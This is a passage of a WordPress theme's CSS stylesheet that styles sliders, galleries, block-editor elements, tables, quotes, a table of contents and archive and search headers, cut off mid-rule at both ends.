100%; height: auto; } .floating-activated .float-holder:before { position: relative; display: block; width: 100%; padding-bottom: 56%; content: ''; } .floatingcolorose { position: absolute; top: auto; right: 0; bottom: 100%; display: block; } .embed-audio .embed-holder { padding-bottom: 33.33%; } .embed-holder iframe { position: absolute; top: 0; right: 0; bottom: 0; left: 0; width: 100%; height: 100%; border: none; border-radius: var(--round-5); } .slider-img-holder { display: block; width: 100%; padding-bottom: 56%; } .coverflow-img-holder { display: block; width: 100%; padding-bottom: 100%; } .slider-img-holder img, .coverflow-img-holder img { position: absolute; z-index: 98; display: block; width: 100%; height: 100%; border-radius: var(--round-5); object-fit: cover; } .gallery-slider-nav-holder img { border-radius: var(--round-3); } .carousel-img-holder img, .coverflow-img-holder img { border-radius: var(--round-5); } .gallery-slider-nav-outer { position: relative; display: flex; flex-flow: row nowrap; } .gallery-slider-nav-holder { position: relative; flex-grow: 1; } .gallery-slider-nav-holder .pre-load { max-height: 102px; opacity: 0; } .gallery-slider-nav { max-width: 750px; margin-top: 15px; margin-right: 0; margin-left: auto; } .gallery-slider-nav .slider-img-holder { padding-bottom: 66.7%; } .slider-caption { position: absolute; z-index: 99; bottom: 0; width: 85%; max-width: 600px; margin: 0; padding: 5px 20px 5px 0; border-top-right-radius: var(--round-5); background-color: var(--solid-white); } .format-gallery-slider .slider-caption { bottom: 30px; padding-left: 10px; } .format-gallery-carousel .caption-text:before, .format-gallery-slider .caption-text:before { width: 30px; } .gallery-slider-info { display: flex; align-items: center; flex-shrink: 0; padding-right: 30px; } .gallery-slider-info svg { width: 60px; } .current-slider-info { display: flex; flex-flow: column nowrap; margin-top: 15px; } .current-slider-count { font-size: 2em; line-height: 1; margin-top: 7px; } .format-gallery-carousel .swiper-container { overflow: visible; } .format-gallery-carousel .swiper-slide { width: auto; } .carousel-img-holder img { width: auto; height: 70vh; max-height: 70vh; object-fit: cover; } .format-gallery-carousel .swiper-scrollbar { position: relative; height: 2px; margin-top: 20px; } .format-gallery-coverflow .swiper-pagination { position: relative; margin-top: 20px; } .gallery-slider-nav .swiper-slide:not(.swiper-slide-thumb-active) img { opacity: .5; } .gallery-slider-nav .swiper-slide:hover img { opacity: 1; } .gallery-slider-nav img { -webkit-transition: opacity .25s var(--timing); transition: opacity .25s var(--timing); } .gallery-coverflow .pre-load { max-height: 50vh; opacity: 0; } .slider-nav { font-size: 24px; position: absolute; z-index: 10; display: flex; flex-flow: row nowrap; color: #fff; } .slider-nav > * { line-height: 1; padding: 10px; -webkit-transition: var(--effect); transition: var(--effect); opacity: 0; } .slider-pagination-top.slider-pagination, .block-wrap .swiper-container-horizontal > .swiper-pagination-bullets { line-height: 0; position: absolute; z-index: 20; top: 0; right: 0; bottom: auto; left: auto; width: auto; height: auto; padding: 15px; } .slider-pagination-top .swiper-pagination-bullet { opacity: .7; color: var(--absolute-white); } .block-wrap:hover .slider-nav > * { opacity: .7; } .block-wrap .slider-nav > *:hover { opacity: 1; } .post-slider .p-wrap { margin-bottom: 0; } .post-slider .overlay-inner > * { -webkit-transition: opacity .5s var(--timing); transition: opacity .5s var(--timing); opacity: 0; } .elementor-editor-active .post-slider .overlay-inner > * { opacity: 1; } .post-slider .swiper-slide-active .overlay-inner > * { opacity: 1; } .swiper-slide-active .overlay-inner > *:nth-child(1) { -webkit-transition-delay: .3s; transition-delay: .3s; } .swiper-slide-active .overlay-inner > *:nth-child(2) { -webkit-transition-delay: .4s; transition-delay: .4s; } .swiper-slide-active .overlay-inner > *:nth-child(3) { -webkit-transition-delay: .5s; transition-delay: .5s; } .swiper-slide-active .overlay-inner > * { -webkit-transition-delay: .6s; transition-delay: .6s; } .e-ct-outer > * { margin-bottom: 30px; } .rbct { position: relative; display: block; } .optimal-line-length:not(.without-sidebar) .s-ct-wrap:not(.has-lsl) { max-width: 730px; margin-right: auto; margin-left: auto; } pre { font-family: Courier, monospace; overflow: auto; padding: 20px; white-space: pre-wrap; word-wrap: break-word; border-radius: var(--round-5); background-color: var(--flex-gray-7); } .has-lsl .s-ct-inner { display: flex; display: -webkit-flex; flex-flow: row nowrap; } .l-shared-sec-outer { position: relative; flex-shrink: 0; padding-right: 30px; padding-bottom: 40px; } .has-lsl .e-ct-outer { flex-grow: 1; width: calc(100% - 78px); max-width: calc(100% - 78px); margin-left: auto; } .l-shared-sec { font-size: 18px; position: sticky; position: -webkit-sticky; top: 12px; -webkit-transition: top .3s ease; transition: top .3s ease; will-change: top; } .l-shared-items { display: flex; align-items: center; flex-flow: column nowrap; border-radius: var(--round-5); box-shadow: 0 5px 30px var(--shadow-7); } .l-shared-sec .share-action { line-height: 48px; width: 48px; text-align: center; } .l-shared-sec i.rbi-whatsapp { width: 100%; } .l-shared-header { display: flex; align-items: center; flex-flow: column wrap; margin-bottom: 10px; } .l-shared-header i { font-size: 18px; } .rbct > *, .comment-content > * { max-width: 100%; margin-top: 0; margin-bottom: 1.5rem; } .rbct > *:last-child, .comment-content > *:last-child { margin-bottom: 0; } .rbct .clearfix { margin-bottom: 0; } .rbct p { word-wrap: break-word; } .comments-pagination { font-size: 12px; display: flex; display: -webkit-flex; justify-content: center; margin: 20px 0 20px 0; padding-bottom: 30px; border-bottom: 5px solid rgba(0, 0, 0, .07); } .comments-pagination .nav-previous, .comments-pagination .nav-next { padding-right: 10px; padding-left: 10px; } .rbct figure { max-width: 100%; height: auto; } .rbct > *.alignleft, img.alignleft, .rbct p img.alignleft { float: left; margin-right: 1.5rem; margin-left: 0; } img.aligncenter, .rbct p img.aligncenter, .rbct > *.aligncenter, .entry-summary > *.aligncenter { display: block; margin-right: auto; margin-left: auto; } .rbct > *.alignright, img.alignright, .rbct p img.alignright { float: right; margin-right: 0; margin-left: 1.5rem; } .rbct input[type='password'] { min-width: 40%; margin-left: 20px; } .rbct .woocommerce { margin-bottom: 0; } .rbct .woocommerce div.product { margin-bottom: 1.5rem; } .aligncenter { display: block; margin-right: auto; margin-left: auto; } .wp-block-image { max-width: 100%; margin-right: 0; margin-left: 0; } .wp-block-image img, .wp-block-image.alignfull img, .wp-block-image.alignwide img, .rbct > .alignwide { max-width: 100%; } .wp-block-image .alignleft, .wp-block-image .alignright, .wp-block-image.is-resized { display: table; margin-right: 0; margin-left: 0; } .wp-block-image .aligncenter { display: table; margin-right: auto; margin-left: auto; } .wp-block-image .aligncenter figcaption { text-align: center; } .image-caption, .wp-caption-text, .gallery-caption, .rbct .wp-block-audio figcaption, .rbct .wp-block-video figcaption, .rbct .wp-block-image figcaption, .rbct .wp-block-embed figcaption { font-size: var(--meta-fsize); margin: 0; padding-top: 5px; } figcaption:before, .wp-caption-text:before { display: inline-block; width: 30px; height: .3em; margin-right: 7px; content: ''; border-top: 1px solid; } .wp-block-image:not(.is-style-rounded) img { border-radius: var(--round-3); } .wp-block-button__link:hover, .is-style-outline > .wp-block-button__link:not(.has-background):hover, .wp-block-button__link.is-style-outline:not(.has-background):hover { color: #fff; background-color: var(--g-color); } .wp-block-image figure { margin: 0; } .wp-block-image .alignleft { float: left; margin-right: 1.5rem; } .wp-block-image .alignright { float: right; margin-left: 1.5rem; } .wp-block-image .aligncenter > figcaption, .wp-block-image .alignleft > figcaption, .wp-block-image .alignright > figcaption, .wp-block-image.is-resized > figcaption { display: table-caption; caption-side: bottom; } .wp-block-gallery.alignleft, .wp-block-gallery.alignright, .blocks-gallery-grid.alignleft, .blocks-gallery-grid.alignright { width: 100%; max-width: 420px; } .wp-block-gallery { width: 100% !important; margin-bottom: calc(2rem - 16px); } .wp-block-gallery.alignwide { clear: both; } .rbct .wp-block-cover .wp-block-cover-text a, .rbct .wp-block-gallery .blocks-gallery-image figcaption, .rbct .wp-block-gallery .blocks-gallery-item figcaption { color: var(--absolute-white); } .rbct .wp-block-gallery ul, .rbct .wp-block-gallery ol { padding-left: 0; list-style: none; } .wp-block-spacer, .rbct .wp-block-spacer { margin: 0; } .wp-block-cover, .wp-block-cover-image { height: auto; color: #fff; } .wp-block-cover-image.alignleft, .wp-block-cover-image.alignright { margin-bottom: 0; } .wp-block-cover-image .wp-block-cover-image-text, .wp-block-cover .wp-block-cover-text, section.wp-block-cover-image > h2 { max-width: 100%; margin: 0 auto !important; } .wp-block-cover__video-background, .rbct .wp-block-cover__video-background { width: 100%; height: 100%; } .wp-block-cover a { text-decoration: none !important; color: inherit !important; } .wp-block-cover a:hover { text-decoration: underline !important; } .rbct dt, .comment-content dt { font-weight: 700; } .rbct a.button { display: inline-block; } .rbct img, .rbct video, .comment-content img { max-width: 100%; height: auto; } .wp-block-video video { width: 100%; } .rbct address, .comment-content address { margin-bottom: 30px; } p:empty, .rbct p:empty, .comment-content p:empty { display: none; } .wp-caption img[class*='wp-image-'] { display: block; margin-right: auto; margin-left: auto; } .rbct figure a { border-bottom: none; } .rbct iframe { overflow: hidden; max-width: 100%; margin-right: auto; margin-bottom: 30px; margin-left: auto; } .rbct ol, .comment-content ol, .rbct ul, .comment-content ul { padding-left: 1rem; list-style-type: decimal; } .rbct ul, .comment-content ul { list-style: circle; } .rbct ul ul, .comment-content ul ul { list-style: disc; } .rbct li > ol, .rbct li > ul { padding-top: .5rem; } .rbct li { position: relative; margin-bottom: .5rem; } .comment-content li { position: relative; margin-bottom: 5px; } .rbct *[class*='wp-block'], .rbct [class*='wp-block'] * { list-style: none; } .rbct > ul[class*='wp-block'], .rbct > ol[class*='wp-block'] { padding-left: 0; } table { width: 100%; max-width: 100%; margin-bottom: 1.5rem; border-spacing: 0; border-collapse: collapse; text-align: left; border-bottom: 1px solid var(--flex-gray-15); border-left: 1px solid var(--flex-gray-15); } table thead { font-family: var(--h6-family); font-size: var(--h6-fsize); font-weight: var(--h6-fweight); font-style: var(--h6-fstyle); line-height: var(--h6-fheight, 1.2); letter-spacing: var(--h6-fspace); text-transform: var(--h6-transform); } th { padding: 5px 10px; border-top: 1px solid var(--flex-gray-15); } th:last-child { border-right: 1px solid var(--flex-gray-15); } td { padding: 5px 10px; border-top: 1px solid var(--flex-gray-15); border-right: 1px solid var(--flex-gray-15); } tr { position: relative; } .rbct tbody tr:nth-child(2n), .comment-content tbody tr:nth-child(2n) { background-color: rgba(0, 0, 0, .025); } .rbct > .wp-block-cover.aligncenter { display: flex; } .wp-block-group.has-background { padding: 20px 30px; } .wp-block-group__inner-container .wp-block-button { margin-bottom: 2rem; } .has-drop-cap:not(:focus):first-letter { font-size: 5em; font-weight: bold; line-height: .8; } .has-drop-cap:not(:focus):after { padding-top: 5px; } .rbct tr { display: table-row; vertical-align: middle; } .rbct td { display: table-cell; vertical-align: inherit; } .rbct .gallery, .gallery { display: flex; display: -webkit-flex; flex-flow: row wrap; margin-top: calc(2rem - 5px); margin-bottom: calc(2rem - 5px); text-align: center; } .gallery-item { position: relative; margin: 0 0 10px 0; padding: 5px; } .gallery-item img { display: block; max-width: 100%; margin-right: auto; margin-left: auto; } .gallery-item div { margin: 0; } .rbct .attachment img { display: block; margin-right: auto; margin-left: auto; } .rbct .twitter-tweet { margin-right: auto; margin-bottom: 0 !important; margin-left: auto; } .rbct blockquote.twitter-tweet { opacity: 0.1; } blockquote { position: relative; padding: 0 1em; quotes: '“' '”' '‘' '’'; } blockquote > * { margin-top: .75rem; margin-bottom: .75rem; } blockquote > *:first-child { margin-top: 0; } blockquote > *:last-child { margin-bottom: 0; } pre.wp-block-verse { font-family: Courier, monospace; } .rbct cite { font-size: var(--rem-mini); } .rbct .is-large cite { font-size: var(--rem-small); } .wp-block-pullquote blockquote:before { font-size: 5em; line-height: 0; position: relative; left: 0; display: block; margin-bottom: 5px; content: open-quote; color: var(--g-color); } .wp-block-pullquote.is-style-solid-color blockquote:before, .wp-block-pullquote.is-style-solid-color cite:before { color: inherit; } .wp-block-pullquote.alignleft, .wp-block-pullquote.alignright { padding: 2em 0; } .wp-block-pullquote.alignleft cite:before, .wp-block-pullquote.alignright cite:before { width: 20px; } .rbct .wp-block-pullquote cite { font-size: var(--rem-small); } .wp-block-pullquote.alignleft cite, .wp-block-pullquote.alignright cite { font-size: var(--rem-mini); } .wp-block-quote.is-large, .wp-block-quote.is-style-large { padding: 0 1.75em; } .wp-block-pullquote { margin-bottom: 0; } blockquote:before { font-size: 2rem; line-height: .75; position: absolute; left: 0; content: '“'; } .wp-block-quote:before { color: var(--g-color); } .wp-block-quote.is-large:before, .wp-block-quote.is-style-large:before { font-size: 3.5em; } .wp-block-quote p, blockquote p { font-family: var(--quote-family, var(--h1-family)); font-weight: var(--quote-fweight, var(--h1-fweight)); letter-spacing: var(--quote-fspace, var(--h1-fspace)); text-transform: var(--quote-transform, var(--h1-transform)); } [data-theme='dark'] blockquote, [data-theme='dark'] blockquote * { color: var(--absolute-white); } .wp-block-quote cite { font-family: var(--meta-family); font-size: var(--rem-small); line-height: 1; } cite br { display: none; } .wp-block-latest-posts.is-grid li { margin-top: 0; margin-bottom: .5rem; } .widget_rss cite:before, .wp-block-quote cite:before, .wp-block-pullquote cite:before { display: inline-block; width: 30px; height: .3em; margin-right: 7px; content: ''; color: var(--g-color); border-top: 1px solid; } .widget_rss cite:before { width: 20px; } .rbct iframe.instagram-media { margin-right: auto; margin-bottom: 1.5em; margin-left: auto; } .rbct a:not(.p-url):not(button):not(.p-category):not(.is-btn):not(.table-link):not(.table-link-depth):not(.wp-block-button__link):not(.wp-block-file__button), .elementor-widget-text-editor p a { font-weight: var(--hyperlink-weight, 700); font-style: var(--hyperlink-style, normal); -webkit-transition: var(--effect); transition: var(--effect); color: var(--hyperlink-color, inherit); text-underline-offset: 1px; text-decoration-color: var(--hyperlink-line-color, transparent); text-decoration-line: underline; } .rbct a:not(.p-url):not(button):not(.p-category):not(.is-btn):not(.table-link):not(.table-link-depth):not(.wp-block-button__link):not(.wp-block-file__button):hover, .elementor-widget-text-editor p a:hover { color: var(--g-color); text-decoration-color: var(--g-color) } .rbct [class*='wp-block'] a { font-family: var(--dwidgets-family); font-size: var(--dwidgets-fsize); font-weight: var(--dwidgets-fweight) !important; font-style: var(--dwidgets-fstyle) !important; line-height: 1.4; -webkit-transition: var(--effect); transition: var(--effect); text-decoration: none !important; letter-spacing: var(--dwidgets-fspace); text-transform: var(--dwidgets-transform); } .rbct .wp-block-button a.wp-block-button__link { font-family: var(--btn-family); font-size: var(--btn-fsize); font-weight: var(--btn-fweight) !important; font-style: var(--btn-fstyle) !important; -webkit-transition: var(--effect); transition: var(--effect); text-decoration: none !important; letter-spacing: var(--btn-fspace); text-transform: var(--btn-transform); border-radius: var(--round-5); } .rbct [class*='wp-block'] a:not(.wp-block-button__link):not(.wp-block-file__button):not(:hover) { color: inherit !important; } .rbct .wp-block-file .wp-block-file__button { color: #fff; border-radius: var(--round-5); } .rbct .wp-block-embed.wp-block-embed-facebook, .rbct .wp-block-embed.wp-block-embed-instagram, .rbct .wp-block-embed.wp-block-embed-twitter { max-width: 520px; margin-right: auto; margin-left: auto; } .gallery-columns-1 .gallery-item { flex: 0 0 100%; width: 100%; } .gallery-columns-2 .gallery-item { flex: 0 0 50%; width: 50%; } .gallery-columns-3 .gallery-item { flex: 0 0 33.333%; width: 33.33%; } .gallery-columns-4 .gallery-item { flex: 0 0 25%; width: 25%; } .gallery-columns-5 .gallery-item { flex: 0 0 20%; width: 20%; } .gallery-columns-6 .gallery-item { flex: 0 0 16.66%; width: 16.66%; } .gallery-columns-7 .gallery-item { flex: 0 0 14.285%; width: 14.285%; } .gallery-columns-8 .gallery-item { flex: 0 0 12.5%; width: 12.5%; } .gallery-columns-9 .gallery-item { flex: 0 0 11.111%; width: 11.111%; } /** inline content ad */ .inline-single-ad.alignfull { display: block; float: none; width: 100%; } .rbct .wpcf7 { position: relative; display: block; overflow: hidden; max-width: 900px; margin-right: auto; margin-bottom: 30px; margin-left: auto; } .rbct .wpcf7 label { display: none; } .rbct .wpcf7 br { display: none; } .wpcf7-list-item input[type='checkbox'], .wpcf7-list-item input[type='radio'] { display: inline-flex; margin-top: 0; margin-right: 7px; margin-bottom: 0; } .wpcf7-form { display: flex; align-items: flex-start; flex-flow: row wrap; margin-right: -12px; margin-left: -12px; } .wpcf7-form .wpcf7-form-control-wrap { width: 50%; max-width: 50%; padding: 12px; } .wpcf7-form .wpcf7-form-control-wrap.your-message { width: 100%; max-width: 100%; } .wpcf7-form .wpcf7-form-control-wrap input { width: 100%; max-width: 100%; } .wpcf7-form .wpcf7-submit { margin: 12px 12px 0 12px; } span.wpcf7-list-item { display: flex; display: -webkit-flex; align-items: center; margin-left: 0; padding-top: 10px; } button, .button, .faux-button, .rbct .wp-block-button__link, .wp-block-file .wp-block-file__button, .rbct input[type='button'], .rbct input[type='reset'], .rbct input[type='submit'] { text-decoration: none; } ul.rb-list, ol.rb-list { padding-left: 0; list-style: none; } .rb-list li:before { font-family: 'ruby-icon' !important; font-size: var(--em-mini); position: relative; display: inline-block; margin-right: 7px; content: '\e960'; color: #5e8858; } .wp-block-group__inner-container > *:not(:last-child) { margin-bottom: 1.5rem; } .rbct .wp-block-file .wp-block-file__button { font-size: 0.88889em; line-height: 1.8; display: table; margin-top: calc(0.75 * 1em); margin-left: 0; -webkit-border-radius: var(--round-5); border-radius: var(--round-5); background-color: var(--g-color); } .rbct blockquote:before { color: var(--g-color); } .rbct table thead { color: #fff; background-color: #333; } .rbct > p > img { margin-top: 1rem; margin-bottom: 1rem; } .rbct > figure.wp-caption.alignleft, .rbct > figure.wp-caption.alignnone, .rbct > figure.wp-caption.aligncenter, .rbct > figure.wp-caption.alignright { margin-top: 1rem; } .rbct > :last-child.wp-block-image { overflow: hidden; } .page-template-default .s-ct .comment-box-wrap.entry-sec, .page-template-default .rbct > *.alignright { clear: both; } .single-rb-etemplate { padding-top: 50px; } .single-rb-etemplate ul, .single-rb-etemplate ol { list-style: none; } .admin-template-info { font-size: 11px; margin-top: 20px; padding: 7px 10px; text-align: center; background-color: var(--flex-gray-15); } .wp-block-pullquote.is-style-solid-color blockquote { margin-bottom: 0; padding: 30px; } .wp-block-pullquote.is-style-solid-color blockquote:before { margin-bottom: 0; } .rbtoc { display: inline-flex; float: none; flex-flow: column nowrap; width: 100%; max-width: 100%; margin-right: 0; padding: 20px; border-radius: var(--round-5); box-shadow: 0 5px 30px var(--shadow-7); } .toc-header { display: flex; align-items: center; width: 100%; margin-bottom: 20px; } .toc-header i { line-height: 0; margin-right: 7px; color: var(--g-color); } .rbtoc .inner a { position: relative; display: block; margin-top: 7px; padding-top: 7px; -webkit-transition: var(--effect); transition: var(--effect); opacity: 1; border-top: 1px solid var(--flex-gray-15); } .rbtoc a:before { font-size: var(--em-mini); display: inline-flex; flex-grow: 0; margin-right: 5px; padding: 0 4px; -webkit-transition: var(--effect); transition: var(--effect); color: var(--absolute-white); border-radius: var(--round-3); background-color: var(--dark-accent); } .rbtoc .inner a:visited, [data-theme='dark'] .rbtoc .inner a:visited:not(:hover):before { color: var(--flex-gray-15); } .rbtoc.no-numlist a:before { display: none; } body:not([data-theme='dark']) .rbtoc .inner a:visited:not(:hover):before { background-color: var(--flex-gray-15); } .rbtoc .inner a:hover { opacity: 1; color: var(--g-color); } .rbtoc a:hover:before { background-color: var(--g-color); } .rbtoc .inner { counter-reset: table-content; } .table-link { counter-reset: table-content-subsection; } .table-link:before { content: counter(table-content); counter-increment: table-content; } .table-link-depth:before { content: counter(table-content) '.' counter(table-content-subsection); counter-increment: table-content-subsection; } div.rbtoc .inner a:first-child { margin-top: 0; padding-top: 0; border-top: 0; } .table-link-depth { margin-left: 20px; } .rbtoc.table-left .table-link-depth:before { margin-right: 3px; } .wp-block-archives, .wp-block-categories { max-width: 350px; } .wp-block-categories-list .count, .wp-block-archives-list .count { font-size: 11px; line-height: 18px; float: right; min-width: 18px; padding: 0 3px; -webkit-transition: var(--effect); transition: var(--effect); text-align: center; color: var(--absolute-white); background-color: var(--absolute-dark); } .wp-block-archives-dropdown select { width: 100%; } .wp-block-latest-comments li { margin-bottom: 20px; } .wp-block-latest-comments a.wp-block-latest-comments__comment-author { text-decoration: none !important; } .wp-block-latest-comments a.wp-block-latest-comments__comment-link { font-family: var(--h4-family); font-size: var(--h4-fsize); font-weight: var(--h4-fweight); line-height: var(--h4-fheight, 1.4); margin-top: 2px; margin-bottom: 0; text-decoration: none !important; } .wp-block-latest-comments .wp-block-latest-comments__comment-date { font-size: 12px; font-weight: 500; margin-top: 5px; color: var(--meta-fcolor); } .wp-block-latest-comments .wp-block-latest-comments__comment-excerpt { font-size: var(--rem-small); line-height: 1.7; margin-top: 12px; } .wp-block-latest-posts li { font-family: var(--h4-family); font-size: var(--h4-fsize); font-weight: var(--h4-fweight); line-height: var(--h4-fheight, 1.4); position: relative; display: block; } .wp-block-separator.is-style-dots:before { padding-left: 1.5rem; letter-spacing: 1.5rem; } .wp-block-latest-posts li:before { font-family: 'ruby-icon' !important; font-size: 8px; font-weight: normal; display: inline; margin-right: 6px; content: '\e900'; -webkit-transition: var(--effect); transition: var(--effect); vertical-align: middle; } .wp-block-latest-posts li:hover:before { text-decoration: none; color: var(--absolute-white); background-color: var(--g-color); } .wp-block-latest-posts__post-date { font-size: 12px; margin-top: 5px; color: var(--meta-fcolor); } .wp-block-rss .wp-block-rss__item-title a { font-family: var(--h4-family); font-size: var(--h4-fsize); font-weight: var(--h4-fweight); display: block; letter-spacing: var(--h4-fspace); } .wp-block-rss .wp-block-rss__item-title a:before { font-family: 'ruby-icon' !important; font-size: var(--em-mini); position: relative; margin-right: 7px; content: '\42'; } .wp-block-rss li.wp-block-rss__item { margin-bottom: 15px; } hr.wp-block-separator:not(.is-style-dots):not(.is-style-wide) { max-width: 100px; margin-left: 0; } .wp-block-separator:not(.is-style-dots) { position: relative; display: block; height: 10px; margin-top: 30px; margin-bottom: 30px; opacity: 1; border: none; background-color: transparent; background-image: radial-gradient(currentColor 1px, transparent 1px); background-repeat: repeat; background-position: 1px 1px; background-size: 5px 5px; } .wp-block-separator:not(.is-style-wide):not(.is-style-dots) { position: relative; display: block; width: 100%; max-width: 100%; height: 10px; margin-top: 30px; margin-bottom: 30px; opacity: .25; border: none; background-color: transparent; background-image: radial-gradient(currentColor 1px, transparent 1px); background-repeat: repeat; background-position: 1px 1px; background-size: 5px 5px; } .rbct *::selection { background: #cfddf0; } [data-theme='dark'] .rbct *::selection { background: #3e4c5f; } .wp-block-code code { font-family: Courier, monospace; display: block; white-space: pre-wrap; overflow-wrap: break-word; } .highlight-shares { line-height: 0; z-index: 999; cursor: pointer; -webkit-transition: all .3s var(--timing); transition: all .3s var(--timing); } .highlight-shares i { font-size: 16px; display: inline-flex; align-items: center; justify-content: center; width: 32px; height: 38px; color: var(--absolute-white); } .highlight-shares i.rbi-reddit { font-size: 20px; margin-top: -2px; } .highlight-shares > div:first-child { display: flex; align-items: center; flex-flow: row nowrap; border-radius: var(--round-7); background-color: var(--absolute-dark); -webkit-box-shadow: 0 4px 15px rgba(0, 0, 0, .15); box-shadow: 0 4px 15px rgba(0, 0, 0, .15); } .highlight-shares > div:last-child { left: 50%; margin-left: -5px; border-top: 5px solid var(--absolute-dark); -webkit-box-shadow: 0 4px 15px rgba(0, 0, 0, .15); box-shadow: 0 4px 15px rgba(0, 0, 0, .15); } .page-selected-outer { display: flex; align-items: center; flex-flow: row nowrap; border-radius: var(--round-7); box-shadow: 0 5px 30px var(--shadow-7); } .page-selected-title { display: flex; align-items: center; padding: 0 10px; } .page-selected-title span { line-height: 1; padding: 7px 15px; color: var(--absolute-white); border-radius: var(--round-3); background-color: var(--g-color); } .page-selected-current { display: flex; align-items: center; cursor: pointer; } .page-selected { position: relative; display: flex; flex-grow: 1; padding: 10px; } .page-selected-nav { padding: 10px; } .page-selected-list { position: absolute; z-index: 888; top: -9999px; right: -10px; left: -10px; display: block; cursor: auto; -webkit-transition: top 0s ease .25s, opacity .25s var(--timing), margin .25s var(--timing) .25s; transition: top 0s ease .25s, opacity .25s var(--timing), margin .25s var(--timing) .25s; pointer-events: none; opacity: 0; border-radius: var(--round-3); background: var(--solid-white); -webkit-box-shadow: 0 4px 30px var(--shadow-7); box-shadow: 0 4px 30px var(--shadow-7); } .page-selected:hover .page-selected-list { top: calc(100% - 1px); bottom: auto; visibility: visible; max-width: 1200px; margin-top: 0; -webkit-transition: top 0s ease 0s, opacity .25s var(--timing), margin .25s var(--timing) 0s; transition: top 0s ease 0s, opacity .25s var(--timing), margin .25s var(--timing) 0s; pointer-events: auto; opacity: 1; } .page-selected-nav.page-links { margin-top: 0; } .page-selected-nav.page-links .post-page-numbers { padding: 0 10px; } .page-list-item:last-child { border: none; } .page-list-item .current, .page-selected-nav .empty-link { pointer-events: none; opacity: .5; } .page-list-item > * { display: block; padding: 7px 20px; -webkit-transition: var(--effect); transition: var(--effect); border-bottom: 1px solid var(--flex-gray-15); } .page-list-item a:hover { color: var(--g-color); border-color: transparent; background-color: var(--flex-gray-7); } .medium-entry-size .rbct > * { font-size: 1.1em; } .medium-entry-size .rbct h1 { font-size: calc(var(--h1-fsize) * 1.1); } .medium-entry-size .rbct h2 { font-size: calc(var(--h2-fsize) * 1.1); } .medium-entry-size .rbct h3 { font-size: calc(var(--h3-fsize) * 1.1); } .medium-entry-size .rbct h4 { font-size: calc(var(--h4-fsize) * 1.1); } .medium-entry-size .rbct h5 { font-size: calc(var(--h5-fsize) * 1.1); } .medium-entry-size .rbct h6 { font-size: calc(var(--h6-fsize) * 1.1); } .big-entry-size .rbct > * { font-size: 1.2em; } .big-entry-size .rbct h1 { font-size: calc(var(--h1-fsize) * 1.2); } .big-entry-size .rbct h2 { font-size: calc(var(--h2-fsize) * 1.2); } .big-entry-size .rbct h3 { font-size: calc(var(--h3-fsize) * 1.2); } .big-entry-size .rbct h4 { font-size: calc(var(--h4-fsize) * 1.2); } .big-entry-size .rbct h5 { font-size: calc(var(--h5-fsize) * 1.2); } .big-entry-size .rbct h6 { font-size: calc(var(--h6-fsize) * 1.2); } .font-resizer-trigger { display: inline-flex; align-items: center; flex-flow: row nowrap; padding-left: 5px; -webkit-transition: var(--effect); transition: var(--effect); } .font-resizer-trigger:after { font-family: 'ruby-icon' !important; font-size: 9px; padding-left: 1px; content: '\e961'; } .medium-entry-size .font-resizer-trigger { -webkit-transform: scale(1.07); transform: scale(1.07); } .big-entry-size .font-resizer-trigger { -webkit-transform: scale(1.15); transform: scale(1.15); } /* ----------------- 10 - Archives ----------------- */ .archive-header { position: relative; z-index: 1; padding-top: 25px; padding-bottom: 25px; } .solid-bg { background-color: var(--flex-gray-7); } .is-pattern:before { position: absolute; z-index: 0; top: 0; right: 0; bottom: 0; left: 0; width: 100%; height: 100%; content: ''; pointer-events: none; opacity: .15; } .pattern-dot:before { background-image: radial-gradient(var(--body-fcolor) 1px, transparent 1px); background-size: 15px 15px; } .pattern-dot2:before { background-image: radial-gradient(var(--body-fcolor) 1px, transparent 1px), radial-gradient(var(--body-fcolor) 1px, var(--solid-white) 1px); background-position: 0 0, 10px 10px; background-size: 20px 20px; } .pattern-diagonal:before { background: repeating-linear-gradient(45deg, var(--body-fcolor), var(--body-fcolor) 7px, transparent 7px, transparent 37px); } .pattern-diagonal2:before { background-image: repeating-linear-gradient(-90deg, var(--body-fcolor), var(--body-fcolor) 1px, transparent 0, transparent 50%); background-size: 24px 24px; } .is-pattern.pattern-diagonal:before, .is-pattern.pattern-diagonal2:before { opacity: .05; } .archive-inner { position: relative; z-index: 10; display: flex; align-items: center; flex-flow: row nowrap; } .archive-header-content { flex-grow: 1; } .archive-header-content .qlinks-content { flex-flow: row wrap; } .archive-header-content .qlink { padding-top: 2px; padding-bottom: 2px; } .taxonomy-description { max-width: 760px; } .taxonomy-description > *:not(:last-child) { margin-bottom: 1em; } .taxonomy-description a { -webkit-transition: var(--effect); transition: var(--effect); text-decoration: underline; } .taxonomy-description a:hover { color: var(--g-color); } .light-scheme .taxonomy-description, .light-scheme .taxonomy-description * { color: var(--absolute-light); } .category-hero-wrap { position: relative; display: flex; flex-flow: row nowrap; flex-grow: 0; width: 100%; max-width: 420px; } .archive-header .category-hero-wrap { width: 33.33%; } .category-hero-item { position: relative; z-index: 100; display: flex; width: 100%; } .category-hero-item:nth-child(2) { position: absolute; z-index: 0; top: 15px; left: 15px; filter: blur(5px); -webkit-filter: blur(5px); } .category-hero-item-inner { position: relative; display: block; overflow: hidden; width: 100%; padding-bottom: 60%; -webkit-border-radius: var(--round-5); border-radius: var(--round-5); } .category-hero-item img { position: absolute; top: 0; right: 0; bottom: 0; left: 0; display: block; width: 100%; height: 100%; object-fit: cover; } .archive-header-content > *:not(:last-child) { margin-bottom: 15px; } .featured-category-img-overlay { position: absolute; z-index: 0; top: 0; right: 0; bottom: 0; left: 0; display: block; width: 100%; height: 100%; } .archive-header.category-header-2 { position: relative; margin-bottom: 40px; padding-top: 50px; padding-bottom: 50px; background-color: var(--dark-accent); } .category-header-2 .archive-header-content { position: relative; z-index: 10; display: flex; align-items: center; flex-flow: column nowrap; text-align: center; } .yes-hd-transparent .archive-header.category-header-2 { padding-top: calc(50px + var(--nav-height)); } .featured-category-img-overlay img { width: 100%; height: 100%; opacity: .5; filter: blur(5px); -webkit-filter: blur(5px); object-fit: cover; } .blog-wrap { margin-top: 30px; margin-bottom: 30px; } .blog-wrap .block-h { margin-bottom: 20px; } .without-sidebar .blog-content { flex-basis: 100%; width: 100%; } .search-header { position: relative; display: block; padding-top: 25px; } .yes-hd-transparent .search-header { padding-top: calc(40px + var(--nav-height)); color: var(--absolute-white); } .search-header:before { position: absolute; top: 0; right: 0; bottom: 27px; left: 0; content: ''; pointer-events: none; background-color: var(--flex-gray-7); } .search-header-inner { position: relative; z-index: 1; } .search-header-content { display: block; margin-bottom: 25px; text-align: center; } .search-subtitle { display: block; margin-top: 10px; color: var(--meta-fcolor); } .search-header-form .search-form { 